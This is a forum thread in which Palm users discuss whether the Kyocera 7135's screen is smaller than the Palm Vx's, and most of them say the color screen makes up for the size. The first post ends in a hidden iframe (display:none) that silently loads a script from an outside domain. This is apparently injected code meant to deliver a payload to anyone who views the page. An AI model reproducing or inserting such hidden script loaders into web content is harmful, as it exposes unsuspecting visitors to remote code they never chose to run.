+ Reply to Thread

Thread: Screen Size

Screen Size

I use a Palm Vx and have been looking the 7135 to take it's place, but haven't been able to get a real feel for the screen size. How do the palm applications look on the 7135? Is there much lose in viewing perception?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: Screen Size

Originally posted by Randfurd_K
    I use a Palm Vx and have been looking the 7135 to take it's place, but haven't been able to get a real feel for the screen size. How do the palm applications look on the 7135? Is there much lose in viewing perception?
    As a former Palm VX user before the 6035, I can say that the 7135 is very good. All Palm applications look exceptional. The screen is slightly smaller on the 7135 than a Palm Vx, but the color is what makes it more readable.

Malcolm

Converged. It didn't even hurt! tuckeyr's Avatar

screen size

I was using a Palm IIIc prior to using the 7135 and I have had NO problem adjusting to the slightly smaller screen. The resolution and color are excellent, so readability is also excellent. IMO, it's true: size DOESN'T matter!

How is it for someone who has not had a palm before? I mean I am used to a full size screen?
    Walt

I've never even owned a stand alone PDA before... only smartphones (and all of the Palm based smartphone screens are smaller than a typical Palm device). But I look at my 7135's screen a LOT throughout an average day and night..... and the size seems great to me!
    Please visit my picture site: Robert-O-Rama :)

Originally posted by wareynolds
    How is it for someone who has not had a palm before? I mean I am used to a full size screen?
    I went from a Palm V to my KYO 6035, and it took me a few days to get used to the small screen of the 6035. The screen on the 7135 is the same size as the 6035. I'm used to the screen size now, and it is not an issue.

Thanks for the responses. I've been using the Vx for just over 2 yrs. and know that the full screen size for text is 2 1/8 x 2 1/8, diag of 3.0 inch. What I haven't been able to see or check is the screen size of the text area of the 7135.

There are several threads on this board that tell you the screen size.

I gave my Vx to one daughter and my VIIx to the other, and love my 7135 screen, despite being smaller. It appears to be about 2"x2" just eyeballing it.

Larry
    Larry Ganz
    http://www.jesusreigns.org
    John 3:16

Thanks for all the answers, sounds like it is a very useable screen. Just might take a short time to get used to.
    Walt

But WELL, WELL worth it.
    ~'kito
    pdaPhoneHome Moderator

I used to own a IIIc and have downgraded to a IIIxe which acctually has a PalmPilot Professional Screen installed in it. (Greeen screeen ) Everytime I look at Markito's 7135 then look back at my IIIxe I get a headache.. I MISS MY COLOR SCREEN. When using Markito's 7135 I was so happy to see a color palm again I never even noticed it was smaller!
    iPhone therefore iAm.